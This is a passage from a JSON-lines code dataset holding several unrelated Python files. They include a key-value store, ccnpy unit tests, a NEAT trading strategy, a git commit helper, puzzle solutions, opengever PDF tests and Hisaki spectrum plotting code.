(ttl == 0):\r\n self.data.pop(key)\r\n self.file_lock.acquire()\r\n file = open(self.file_path, 'w')\r\n json.dump(self.data, file)\r\n self.file_lock.release()\r\n self.data_lock.release()\r\n print(\"pair deleted\")\r\n return\r\n else:\r\n self.data_lock.release()\r\n raise Exception(\"Key's TTL has expired.\")\r\n","sub_path":"datastore.py","file_name":"datastore.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"409024267","text":"# Copyright 2019 Marc Mosko\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport array\nimport unittest\n\nimport ccnpy\nimport ccnpy.flic\n\n\nclass test_Pointers(unittest.TestCase):\n def test_serialize(self):\n h1 = ccnpy.HashValue(1, array.array('B', [1, 2]))\n h2 = ccnpy.HashValue(2, array.array('B', [3, 4]))\n h3 = ccnpy.HashValue(3, array.array('B', [5, 6]))\n\n p = ccnpy.flic.Pointers([h1, h2, h3])\n actual = p.serialize()\n\n expected = array.array(\"B\", [0, 2, 0, 18,\n 0, 1, 0, 2, 1, 2,\n 0, 2, 0, 2, 3, 4,\n 0, 3, 0, 2, 5, 6])\n self.assertEqual(expected, actual)\n\n def test_parse(self):\n h1 = ccnpy.HashValue(1, array.array('B', [1, 2]))\n h2 = ccnpy.HashValue(2, array.array('B', [3, 4]))\n h3 = ccnpy.HashValue(3, array.array('B', [5, 6]))\n expected = ccnpy.flic.Pointers([h1, h2, h3])\n\n wire_format = array.array(\"B\", [0, 2, 0, 18,\n 0, 1, 0, 2, 1, 2,\n 0, 2, 0, 2, 3, 4,\n 0, 3, 0, 2, 5, 6])\n tlv = ccnpy.Tlv.deserialize(wire_format)\n actual = ccnpy.flic.Pointers.parse(tlv)\n self.assertEqual(expected, actual)\n","sub_path":"ccnpy/flic/tests/test_Pointers.py","file_name":"test_Pointers.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"582956772","text":"from abc import ABC, abstractmethod\nfrom Classes.Utilities import Iterator, Container\nfrom Classes import Statics\nfrom Classes.DatabaseHandlers import add, delete, create_table, update, addFactory\n\nclass AccessDatabaseMedicines(Container.Container):\n\n def __init__(self):\n super(Container.Container, self).__init__()\n\n\n def getIterator(self):\n return AccessDatabaseMedicines.DatabaseMedicines()\n\n\n\n class DatabaseMedicines(Iterator.Iterator):\n def __init__(self, index=0):\n self.index=0\n\n def hasNext(self):\n if self.index < Statics.medList.__len__():\n return True\n else:\n return False\n\n def next(self):\n if self.hasNext():\n a = Statics.medList.__getitem__(self.index)\n self.index += 1\n return a\n else:\n self.index=0\n\n def add(self, toAdd):\n addFactory.addFactory().add(create_table.Medicines, str(toAdd))\n #Statics.medList.append(toAdd)\n\n def remove(self, toBeRemove):\n delete.Delete(create_table.Medicines, str(toBeRemove))\n\n def update(self, medID, attribute, newValue):\n print(medID, attribute, newValue)\n update.Update(\"\", medID, attribute, newValue)\n pass\n #dowork\n\n def search(self, toSearch):\n result=[]\n if toSearch==\"\":\n result = \"No Matches\"\n return result\n while self.hasNext():\n temp1 = self.next()\n temp2 = temp1.split(\"#\")\n for i in temp2:\n if (i.capitalize()).__contains__((Statics.searchKey).capitalize()):\n result.append(temp1)\n break\n if result.__len__()==0:\n result = \"No Matches\"\n return result\n","sub_path":"Classes/DatabaseAccessors/AccessDatabaseMedicines.py","file_name":"AccessDatabaseMedicines.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"226690574","text":"# Copyright 2019 The TensorTrade Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport json\n\nimport pandas as pd\nimport numpy as np\n\nfrom statistics import mode, stdev, StatisticsError\n\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Union, Callable, List, Dict\n\nimport neat\nfrom collections import Counter\n\nfrom tensortrade.environments.trading_environment import TradingEnvironment\nfrom tensortrade.features.feature_pipeline import FeaturePipeline\nfrom tensortrade.strategies import TradingStrategy\nfrom termcolor import colored as c\nfrom IPython.display import clear_output\nimport math\nimport random\n\nimport matplotlib.pyplot as plt\n\nclass NeatTradingStrategy(TradingStrategy):\n \"\"\"A trading strategy capable of self tuning, training, and evaluating using the NEAT Neuralevolution.\"\"\"\n\n # todo: pass in config file\n def __init__(self, environment: TradingEnvironment, neat_config: str, **kwargs):\n \"\"\"\n Arguments:\n environment: A `TradingEnvironment` instance for the agent to trade within.\n neat_sepc: A specification dictionary for the `Tensorforce` agent's model network.\n kwargs (optional): Optional keyword arguments to adjust the strategy.\n \"\"\"\n self._environment = environment\n\n self._max_episode_timesteps = kwargs.get('max_episode_timesteps', None)\n self._neat_config_filename = neat_config\n self._config = self.load_config()\n self._genome_performance = {}\n self._learn_to_trade_theshold = kwargs.get('learn_to_trade_theshold', 300)\n\n @property\n def environment(self):\n return self._environment\n\n def load_config(self):\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n self._neat_config_filename)\n config.genome_config.num_inputs = len(self._environment.exchange.data_frame.columns)\n config.genome_config.input_keys = [-i - 1 for i in range(config.genome_config.num_inputs)]\n return config\n\n def restore_agent(self, path: str, model_path: str = None):\n raise NotImplementedError\n\n def save_agent(self, path: str, model_path: str = None, append_timestep: bool = False):\n raise NotImplementedError\n\n def _finished_episode_cb(self) -> bool:\n n_episodes = runner.episode\n n_timesteps = runner.episode_timestep\n avg_reward = np.mean(runner.episode_rewards)\n print(\"Average Trades:\", self.exchange.performance[-10:] )\n print(\"Trades: \", mean(self._genome_performance[\"trades\"]))\n\n print(\"Finished episode {} after {} timesteps.\".format(n_episodes, n_timesteps))\n print(\"Average episode reward: {})\".format(avg_reward))\n\n return True\n\n def tune(self, steps: int = None, episodes: int = None, callback: Callable[[pd.DataFrame], bool] = None) -> pd.DataFrame:\n raise NotImplementedError\n\n def _eval_population(self, genomes, config):\n # find a window to evaluate all genomes on\n data_frame_window = 500\n data_frame_length = self.environment.exchange.data_frame.shape[0]\n data_frame_start_tick = random.randint(0, data_frame_length - data_frame_window)\n print(\"Starting at DF[{}]\".format(data_frame_start_tick))\n # show the current plot for the price window.\n # plt.plot(self.environment.exchange.data_frame[data_frame_start_tick:data_frame_start_tick+data_frame_window]['close'])\n # plt.show()\n\n for genome_id, genome in genomes:\n self._environment.reset()\n # set the current_step to the start of our window\n self.environment._exchange._current_step = data_frame_start_tick\n self.environment._current_step = data_frame_start_tick\n\n self.eval_genome(genome, data_frame_window)\n\n p = self._genome_performance[genome.key]\n print(\"Genome Performance: \", genome.key)\n\n if p['rewards'] > 0:\n print(\"Rewards:\", c(p['rewards'], 'green'))\n else:\n print(\"Rewards:\", p['rewards'])\n\n print('Balance:', p['balance'])\n if p['net_worth'] > 10000:\n print(\"Net Worth:\", c(p['net_worth'], 'green'))\n else:\n print(\"Net Worth:\", p['net_worth'])\n\n print('Steps', p['steps_completed'])\n try:\n print('Most common action', Counter(p['actions']))\n except StatisticsError:\n print('No Action Mode:', p['actions'])\n print('Number of trades:', Counter(self._environment.exchange.trades['type']))\n print(' ')\n # plt.clf()\n clear_output()\n\n def eval_genome(self, genome, data_frame_window):\n print('---------------------------')\n\n # Initialize the network for this genome\n net = neat.nn.RecurrentNetwork.create(genome, self._config)\n # calculate the steps and keep track of some intial variables\n steps = len(self._environment._exchange.data_frame)\n steps_completed = 0\n done = False\n actions = self._environment.action_strategy.n_actions\n\n performance = {\"rewards\":0, \"balance\":0, \"net_worth\":0, \"actions\": [], \"steps_completed\":0, 'trades':0}\n self._genome_performance[genome.key] = performance\n # we need to know how many actions we are able to take\n\n starting_balance = self._environment.exchange.balance\n\n # set inital reward\n genome.fitness = 0.0\n\n # walk all timesteps to evaluate our genome\n # while (steps is not None and (steps == 0 or steps_completed < (steps))):\n while(steps_completed < data_frame_window):\n # Get the current data observation\n current_dataframe_observation = self._environment._exchange.data_frame[steps_completed:steps_completed+1]\n current_dataframe_observation = current_dataframe_observation.values.flatten()\n\n # activate() the genome and calculate the action output\n output = net.activate(current_dataframe_observation)\n\n # action at current step\n action = int(self._environment.action_strategy.n_actions/2 * (1 + math.tanh(output[0])))\n\n # feed action into environment to get reward for selected action\n obs, rewards, done, info = self.environment.step(action)\n\n # feed rewards to NEAT to calculate fitness.\n genome.fitness += rewards\n\n # count this as a completed step\n steps_completed += 1\n\n # stop iterating if we haven't learned to trade or we pass a fitness threshold\n if genome.fitness < -10000:\n print(\"Learn to trade asshole!\")\n done= True\n\n\n\n # if steps_completed > self._learn_to_trade_theshold and len(self._environment.exchange.trades) is 0:\n # genome.fitness = self._genome_performance[genome.key]['rewards'] = -100000 #lern to trade asshole...\n #\n # # stop iterating if we haven't learned to SELL in the first N timesteps\n # if steps_completed > self._learn_to_trade_theshold and len(self._environment.exchange.trades) is 0:\n # genome.fitness = self._genome_performance[genome.key]['rewards'] = -100000 #lern to trade asshole...\n # print(\"Learn to trade asshole!\")\n # done= True\n #\n # if (\n # steps_completed > self._learn_to_trade_theshold and\n # len(self._environment.exchange.trades) is not 0 and\n # self._environment.exchange.trades.any()\n # ) :\n #\n # genome.fitness = self._genome_performance[genome.key]['rewards'] = -100 #lern to trade asshole...\n # dones= True\n\n self._genome_performance[genome.key]['rewards'] += rewards\n self._genome_performance[genome.key]['actions'].append(action)\n self._genome_performance[genome.key]['steps_completed'] = steps_completed\n self._genome_performance[genome.key]['trades'] = len(self._environment.exchange.trades)\n self._genome_performance[genome.key]['balance'] = self._environment.exchange.balance\n self._genome_performance[genome.key]['net_worth'] = self._environment.exchange.net_worth\n\n if done:\n print('-------WE DONE!---------')\n break\n\n\n def run(self, generations: int = None, testing: bool = True, episode_callback: Callable[[pd.DataFrame], bool] = None) -> pd.DataFrame:\n\n # create population\n pop = neat.Population(self._config)\n # add reporting\n pop.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n pop.add_reporter(stats)\n pop.add_reporter(neat.Checkpointer(5))\n\n # Run for up to 300 generations.\n winner = pop.run(self._eval_population, generations)\n\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n # Show output of the most fit genome against training data.\n # print('\\nOutput:')\n\n # p = neat.Checkpointer.restore_checkpoint('neat-checkpoint-4')\n\n return [self._environment._exchange.performance, winner, stats]\n","sub_path":"tensortrade/neat_trading_strategy.py","file_name":"neat_trading_strategy.py","file_ext":"py","file_size_in_byte":9849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"295244032","text":"# _*_ coding:utf-8 _*_\n\nimport os\nos.chdir(\"../Plugins/Unity3DGameLib\")\nos.system(\"git status\")\nos.system(\"git add .\")\nos.system(\"git status\")\n\ncomment = raw_input(\"Enter Commit Message:\")\nif(comment == ''):\n\tcomment = \"Code Update\"\n\ncommit_command = 'git commit -m \"%s\"' % (comment)\npush_command = 'git push origin master'\nos.system(commit_command)\nos.system(push_command)\n\nprint(\"Press any key to exit\")\nraw_input()","sub_path":"commit_unit3d_game_lib.py","file_name":"commit_unit3d_game_lib.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"362565175","text":"# ------------------------------------------------------------------------------------------------------------------\n# Today we're going to balance words on one of the letters in them. We'll use the position and letter itself to\n# calculate the weight around the balance point. A word can be balanced if the weight on either side of the balance\n# point is equal. Not all words can be balanced, but those that can are interesting for this challenge.\n# The formula to calculate the weight of the word is to look at the letter position in the English alphabet\n# (so A=1, B=2, C=3 ... Z=26) as the letter weight, then multiply that by the distance from the balance point,\n# so the first letter away is multiplied by 1, the second away by 2, etc.\n# As an example: STEAD balances at T: 1 * S(19) = 1 * E(5) + 2 * A(1) + 3 * D(4))\n# ------------------------------------------------------------------------------------------------------------------\n\ndef balance(word):\n teeter = len(word)//2 # Starting point of the balancing\n length = len(word)\n status = True\n\n # Puts the position and number-value of a letter into a list for comparison\n values_list = [(position, (ord(character)-96)) for position, character in enumerate(word)]\n comparison = compare(values_list, teeter, length)\n\n # If chain that will be entered if the word is unbalanced at the start of the program.\n if comparison[0] < comparison[1]:\n while True:\n teeter += 1 # Moves the midpoint closer to the right side to change the balance\n if teeter == (length - 1): # if the end of the word is reached it cannot be balanced\n status = False\n print(\"{} cannot be balanced.\".format(word))\n break\n comparison = compare(values_list, teeter, length)\n if comparison[0] == comparison[1]: break\n elif comparison[0] > comparison[1]:\n while True:\n teeter -= 1 # Moves the midpoint closer to the left side of the word to change the balance\n if teeter == 0: # If the beginning of the word is reached it cannot be balanced\n status = False\n print(\"{} cannot be balanced.\".format(word))\n break\n comparison = compare(values_list, teeter, length)\n if comparison[0] == comparison[1]:\n break\n if status == True: print(\"{} {} {} - {}\".format(word[:teeter], word[teeter], word[teeter+1:], comparison[0]))\n\n\n\n# A function to compare the different \"weights\" of a word\ndef compare(values, totter, length):\n low_sum = 0\n high_sum = 0\n for i in range(0,totter):\n low_sum += (totter - values[i][0])*values[i][1]\n for h in range(totter+1, length):\n high_sum += (values[h][0] - totter)*values[h][1]\n return (low_sum, high_sum)\n\n\nif __name__ == '__main__':\n balance(\"superglue\")\n","sub_path":"Daily_Challenges/Word_Balance.py","file_name":"Word_Balance.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"156189338","text":"# @Time : 2020/10/25 23:53\n# @Author : LiuBin\n# @File : 845.py\n# @Description : \n# @Software: PyCharm\n\"\"\"数组中的最长山脉\n思路: dp、双指针\n1、分别扫一遍截止到当前元素的最大升序和最大降序,然后求和得到最大的值\n2、双指针\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def longestMountain(self, A: List[int]) -> int:\n if len(A) < 3:\n return 0\n last = A[0]\n dp_pre = [0]\n for a in A:\n if a > last:\n dp_pre.append(dp_pre[-1] + 1)\n else:\n dp_pre.append(0)\n last = a\n last = A[-1]\n dp_post = [0]\n for a in A[::-1]:\n if a > last:\n dp_post.insert(0, dp_post[0] + 1)\n else:\n dp_post.insert(0, 0)\n last = a\n max_ = 0\n for pre, post in zip(dp_pre[1:], dp_post[:-1]):\n if pre and post:\n max_ = max(pre + post + 1, max_)\n return max_\n\n\nprint(Solution().longestMountain([2, 1, 4, 7, 3, 2, 5]))\n","sub_path":"leetcode/towpointer/845.py","file_name":"845.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"507275457","text":"from ftw.builder import Builder\nfrom ftw.builder import create\nfrom ftw.pdfgenerator.builder import Builder as PDFBuilder\nfrom ftw.pdfgenerator.interfaces import ILaTeXView\nfrom ftw.pdfgenerator.utils import provide_request_layer\nfrom ftw.testing import MockTestCase\nfrom opengever.dossier.behaviors.dossier import IDossierMarker\nfrom opengever.latex import dossierdetails\nfrom opengever.latex.dossierdetails import IDossierDetailsLayer\nfrom opengever.latex.layouts.default import DefaultLayout\nfrom opengever.latex.testing import LATEX_ZCML_LAYER\nfrom opengever.testing import FunctionalTestCase\nfrom opengever.testing import select_current_org_unit\nfrom plone.app.testing import TEST_USER_ID\nfrom zope.component import getMultiAdapter\nfrom zope.publisher.interfaces.browser import IDefaultBrowserLayer\nfrom ftw.testbrowser import browsing\n\n\nclass TestDossierDetailsPDFView(MockTestCase):\n\n layer = LATEX_ZCML_LAYER\n\n def test_is_registered(self):\n context = self.providing_stub([IDossierMarker])\n request = self.providing_stub([IDefaultBrowserLayer])\n\n self.replay()\n view = getMultiAdapter((context, request),\n name='pdf-dossier-details')\n\n self.assertTrue(isinstance(\n view, dossierdetails.DossierDetailsPDFView))\n\n def test_render_adds_browser_layer(self):\n context = request = self.create_dummy()\n\n view = self.mocker.patch(\n dossierdetails.DossierDetailsPDFView(context, request))\n\n self.expect(view.allow_alternate_output()).result(False)\n self.expect(view.export())\n\n self.replay()\n\n view.render()\n self.assertTrue(dossierdetails.IDossierDetailsLayer.providedBy(\n request))\n\n\nclass TestDossierDetails(FunctionalTestCase):\n use_default_fixture = False\n\n def setUp(self):\n super(TestDossierDetails, self).setUp()\n self.user = create(Builder('ogds_user')\n .having(firstname='t\\xc3\\xa4st'.decode('utf-8'),\n lastname=u'User'))\n self.admin_unit = create(Builder('admin_unit')\n .as_current_admin_unit()\n .having(title=u'Regierungsrat'))\n self.org_unit = create(Builder('org_unit')\n .having(title=u'Regierungsrat',\n admin_unit=self.admin_unit)\n .with_default_groups()\n .assign_users([self.user]))\n\n select_current_org_unit(self.org_unit.id())\n\n @browsing\n def test_dossierdetails_view(self, browser):\n repositoryroot = create(Builder('repository_root')\n .titled(u'Repository'))\n repository_1 = create(Builder('repository')\n .titled(u'Repository Folder')\n .within(repositoryroot))\n repository_1_1 = create(Builder('repository')\n .titled(u'Sub Repository Folder')\n .within(repository_1))\n dossier = create(Builder('dossier')\n .within(repository_1_1)\n .having(responsible=self.user.userid))\n create(Builder('task')\n .within(dossier)\n .having(responsible=self.user.userid,\n responsible_client=self.org_unit.id()))\n\n browser.login().visit(dossier, view='pdf-dossier-details')\n\n def get_dossierdetails_view(self, dossier):\n provide_request_layer(dossier.REQUEST, IDossierDetailsLayer)\n layout = DefaultLayout(dossier, dossier.REQUEST, PDFBuilder())\n return getMultiAdapter(\n (dossier, dossier.REQUEST, layout), ILaTeXView)\n\n def test_responsible_contains_admin_unit_and_userid(self):\n dossier = create(Builder('dossier')\n .having(responsible=TEST_USER_ID))\n\n dossierdetails = self.get_dossierdetails_view(dossier)\n self.assertEquals(\n 'Regierungsrat / User t\\xc3\\xa4st (test_user_1_)',\n dossierdetails.get_responsible().encode('utf-8'))\n\n def test_repository_path_is_a_reverted_path_seperated_with_slahes(self):\n repositoryroot = create(Builder('repository_root')\n .titled(u'Repository'))\n repository_1 = create(Builder('repository')\n .titled(u'Repository Folder')\n .within(repositoryroot))\n repository_1_1 = create(Builder('repository')\n .titled(u'Sub Repository Folder')\n .within(repository_1))\n dossier = create(Builder('dossier').within(repository_1_1))\n\n dossierdetails = self.get_dossierdetails_view(dossier)\n\n self.assertEquals(\n u'1.1. Sub Repository Folder / 1. Repository Folder',\n dossierdetails.get_repository_path())\n\n def test_repository_path_do_not_escape_special_latex_characters(self):\n \"\"\"The escaping is done by the `get_dossier_metadata` method\n and shouldn't be done twice.\"\"\"\n\n repofolder = create(Builder('repository')\n .titled(u'Foo & Bar'))\n\n dossier = create(Builder('dossier').within(repofolder))\n dossierdetails = self.get_dossierdetails_view(dossier)\n\n self.assertEquals(\n '1. Foo & Bar',\n dossierdetails.get_repository_path())\n","sub_path":"opengever/latex/tests/test_dossierdetails.py","file_name":"test_dossierdetails.py","file_ext":"py","file_size_in_byte":5529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"175135007","text":"\"\"\"\nCreated on 2019-10-25\n\n@author: K. Masunaga, LASP CU Boulder (kei.masunaga@lasp.colorado.edu)\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom common.tools import AnchoredHScaleBar\n\nfrom HskClass import HskData, Img, Xslice, Yslice, CalData, HskHorizons, EuvStar\nfrom MyRc import HskRc\nrc = HskRc()\n\n\ndef get_date_acc(fnames):\n if type(fnames) is not list:\n fnames = [fnames]\n date_acc = ''\n for ifname in fnames:\n hskdat = HskData(ifname, open=False)\n date_acc += hskdat.date + ', '\n\n return date_acc\n\ndef qlplot_KAI(subdicAll, linename=None, save=False):\n dic_common = subdicAll['common']\n dic_linename = subdicAll[linename]\n dic_save_mode = subdicAll['save_mode']\n\n ## Load data from dictionary\n # number of data\n ndat, ndat_sky = dic_common['ndat'], dic_common['ndat_sky']\n if ndat_sky is None:\n dickey = 'ndat' + str(int(ndat)) + '_nsky' + str(ndat_sky)\n else:\n dickey = 'ndat' + str(int(ndat)) + '_nsky' + str(int(ndat_sky))\n\n # img objects\n img_mean = dic_linename['img_mean']\n img_sky_mean = dic_linename['img_sky_mean']\n img_sub = dic_linename['img_sub']\n # xslice objects\n xsl_mean = dic_linename['xslice_mean']\n xsl_sky_mean = dic_linename['xslice_sky']\n xsl_sub = dic_linename['xslice_sub']\n # yslice objects\n ysl_mean = dic_linename['yslice_mean']\n ysl_sky_mean = dic_linename['yslice_sky']\n ysl_sub = dic_linename['yslice_sub']\n # lim data\n wvlim_sl = dic_linename['wvlim_sl'] # [1056, 1076]#\n xlim_sl = dic_linename['xlim_sl'] # [433, 451]#\n ylim_sl = dic_linename['ylim_sl']\n ylim_adj = dic_linename['ylim_adj']\n ylim_away = dic_linename['ylim_away']\n\n br = dic_linename['I']\n br_err = dic_linename['I_err']\n\n # yfit model\n fitted_model = dic_linename['yfit_model']\n\n # misc items\n fname = dic_common['fname']\n date = get_date_acc(fname)\n target_body = dic_common['target_body']\n diam = dic_common['diam']\n npix_disk = dic_common['npix_disk']\n obs_period = dic_common['obs_period']\n period_str = '{:02}'.format(obs_period)\n xscl = 10\n yscl = 4.2\n\n with_sky = dic_save_mode['with_sky']\n mlt_date = dic_save_mode['mlt_date']\n adjust_bg = dic_save_mode['adjust_bg']\n flip_n_roll_sky = dic_save_mode['flip_n_roll_sky']\n # flip_n_roll_sky = False\n # define figure name\n figtit = target_body + '_' + date[:-2] + '\\n on_(' + str(ndat) + '), ' + 'off_(' + str(ndat_sky) + '), '\n\n ## set plot lim\n wvlim_plt = [500, 1500]#[wvlim_sl[0] - 50, wvlim_sl[1] + 50]\n ylim_plt = [500, 640]\n img_mean_max = np.max(img_mean.counts[ylim_sl[0]:ylim_sl[1], xlim_sl[0]:xlim_sl[1]])\n if with_sky:\n img_max = np.max(abs(img_sub.counts[ylim_sl[0]:ylim_sl[1], xlim_sl[0]:xlim_sl[1]]))\n idx_cnts = np.where(abs(img_sub.counts[ylim_sl[0]:ylim_sl[1], xlim_sl[0]:xlim_sl[1]]) == img_max)\n else:\n img_max = np.max(abs(img_mean.counts[ylim_sl[0]:ylim_sl[1], xlim_sl[0]:xlim_sl[1]]))\n idx_cnts = np.where(abs(img_mean.counts[ylim_sl[0]:ylim_sl[1], xlim_sl[0]:xlim_sl[1]]) == img_max)\n ymax_cnts = idx_cnts[0][0] + ylim_sl[0]\n xmax_cnts = idx_cnts[1][0] + xlim_sl[0]\n wlmax_cnts = img_mean.xcal[xmax_cnts] # caldat.xcal[xmax_cnts]\n\n ## Start plotting ##\n plt.close()\n fig = plt.figure(figsize=[12.5, 10])\n widths = [3, 1]\n gs = fig.add_gridspec(5, 2, width_ratios=widths) # fig.add_gridspec(5, 2, height_ratios=heights)\n plt.subplots_adjust(hspace=0.5)\n\n ax1 = fig.add_subplot(gs[0, 0])\n img_mean.plot(vmin=0, vmax=img_mean_max * 1.1)\n img_mean.plot_vline(wvlim_sl[0], color='r', linestyle='--')\n img_mean.plot_vline(wvlim_sl[1], color='r', linestyle='--')\n img_mean.plot_hline(ylim_sl[0], color='r', linestyle='--')\n img_mean.plot_hline(ylim_sl[1], color='r', linestyle='--')\n ax1.set_xlim(wvlim_plt)\n ax1.set_ylim(ylim_plt)\n ax1.set_title(figtit)\n\n ax12 = fig.add_subplot(gs[0, 1])\n img_mean.plot(vmin=0, vmax=img_mean_max * 1.1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, diam / xscl, diam / yscl, edgecolor='r', facecolor='None', lw=1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, 3 * diam / xscl, 3 * diam / yscl, edgecolor='r', facecolor='None',\n lw=1)\n ax12.set_xlim(wvlim_sl)\n ax12.set_ylim(ylim_sl)\n\n if with_sky or flip_n_roll_sky:\n ax2 = fig.add_subplot(gs[1, 0])\n img_sky_mean.plot(vmin=0, vmax=img_mean_max * 1.1)\n img_sky_mean.plot_vline(wvlim_sl[0], color='r', linestyle='--')\n img_sky_mean.plot_vline(wvlim_sl[1], color='r', linestyle='--')\n img_sky_mean.plot_hline(ylim_sl[0], color='r', linestyle='--')\n img_sky_mean.plot_hline(ylim_sl[1], color='r', linestyle='--')\n ax2.set_xlim(wvlim_plt)\n ax2.set_ylim(ylim_plt)\n\n ax22 = fig.add_subplot(gs[1, 1])\n img_sky_mean.plot(vmin=0, vmax=img_mean_max * 1.1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, diam / xscl, diam / yscl, edgecolor='r', facecolor='None', lw=1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, 3 * diam / xscl, 3 * diam / yscl, edgecolor='r', facecolor='None',\n lw=1)\n ax22.set_xlim(wvlim_sl)\n ax22.set_ylim(ylim_sl)\n\n ax3 = fig.add_subplot(gs[2, 0])\n img_sub.plot(cmap='RdYlBu_r', vmin=-img_max * 1.1, vmax=img_max * 1.1)\n img_sub.plot_vline(wvlim_sl[0], color='r', linestyle='--')\n img_sub.plot_vline(wvlim_sl[1], color='r', linestyle='--')\n img_sub.plot_hline(ylim_sl[0], color='r', linestyle='--')\n img_sub.plot_hline(ylim_sl[1], color='r', linestyle='--')\n ax3.set_xlim(wvlim_plt)\n ax3.set_ylim(ylim_plt)\n\n ax32 = fig.add_subplot(gs[2, 1])\n img_sub.plot(cmap='RdYlBu_r', vmin=-img_max * 1.1, vmax=img_max * 1.1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, diam / xscl, diam / yscl, edgecolor='r', facecolor='None', lw=1)\n img_mean.plot_ellipse(wlmax_cnts, ymax_cnts, 3 * diam / xscl, 3 * diam / yscl, edgecolor='r', facecolor='None',\n lw=1)\n ax32.set_xlim(wvlim_sl)\n ax32.set_ylim(ylim_sl)\n\n ## Plot xslice\n ax4 = fig.add_subplot(gs[3, :])\n xsl_mean.plot(color='C3', label='mars')\n ax4.set_xlim(wvlim_plt)\n ax4.set_ylim(-max(xsl_sky_mean.counts[xlim_sl[0]:xlim_sl[1]] * 1.2),\n max(xsl_mean.counts[xlim_sl[0]:xlim_sl[1]]) * 1.2)\n if adjust_bg:\n xsl_sky_mean.plot(color='C9', label='sky')\n else:\n xsl_sky_mean.plot(color='C0', label='sky')\n xsl_sub.plot(color='k', label='mars-sky')\n\n xsl_mean.plot_vline(wvlim_sl[0], color='r', linestyle='--')\n xsl_mean.plot_vline(wvlim_sl[1], color='r', linestyle='--')\n xsl_mean.plot_hline(0, color='grey', linewidth=1, linestyle=':')\n plt.legend(loc='upper right')\n ## Add a scale of the spectral resolution\n rsx = AnchoredHScaleBar(size=8, label=\"spectral resolution\", loc='upper left', frameon=False, pad=0, sep=4,\n color=\"k\", linewidth=0.8)\n ax4.add_artist(rsx)\n obx = AnchoredHScaleBar(size=diam / xscl, label=\"2 ${R_{M}}$\", loc='lower center', frameon=False, pad=0, sep=4,\n color=\"k\", linewidth=0.8)\n ax4.add_artist(obx)\n # ctools.copy_plot_width(ax1, ax4)\n\n ## Plot yslice\n ax5 = fig.add_subplot(gs[4, :])\n ysl_mean.plot(color='C3', label='mars')\n ax5.set_xlim(ylim_plt)\n if with_sky or flip_n_roll_sky:\n ax5.set_ylim(-max(ysl_sky_mean.counts[ylim_plt[0]:ylim_plt[1]] * 1.2),\n max(ysl_mean.counts[ylim_plt[0]:ylim_plt[1]]) * 1.2)\n else:\n ax5.set_ylim(-max(ysl_mean.counts[ylim_plt[0]:ylim_plt[1]] * 1.2 * 0.1),\n max(ysl_mean.counts[ylim_plt[0]:ylim_plt[1]]) * 1.2)\n ysl_mean.plot_vline(ylim_sl[0], color='r', linestyle='--')\n ysl_mean.plot_vline(ylim_sl[1], color='r', linestyle='--')\n\n if with_sky or flip_n_roll_sky:\n if adjust_bg:\n ysl_sky_mean.plot(color='C9', label='sky')\n else:\n ysl_sky_mean.plot(color='C0', label='sky')\n ysl_sub.plot(color='k', label='mars-sky')\n else:\n ysl_mean.plot_vline(ylim_away[0], color='C0', linestyle='--')\n ysl_mean.plot_vline(ylim_away[1], color='C0', linestyle='--')\n\n if adjust_bg:\n ysl_mean.plot_vline(ylim_adj[0], color='C9', linestyle='--')\n ysl_mean.plot_vline(ylim_adj[1], color='C9', linestyle='--')\n ysl_mean.plot_hline(0, color='grey', linewidth=1, linestyle=':')\n\n ## Overplot fitted model on the yslice\n if with_sky or flip_n_roll_sky:\n ycal = ysl_sub.ycal\n plt.plot(ycal, fitted_model(ycal), color='grey')\n plt.legend()\n plt.legend(loc='upper right')\n\n ## Add a scale of the pointing accuracy\n point_acc = 25\n rsy = AnchoredHScaleBar(size=point_acc / yscl, label=\"pointing accuracy\", loc='upper left', frameon=False, pad=0,\n sep=4, color=\"k\", linewidth=0.8)\n ax5.add_artist(rsy)\n oby = AnchoredHScaleBar(size=diam / yscl, label=\"2 ${R_{M}}$\", loc='lower center', frameon=False, pad=0, sep=4,\n color=\"k\", linewidth=0.8)\n 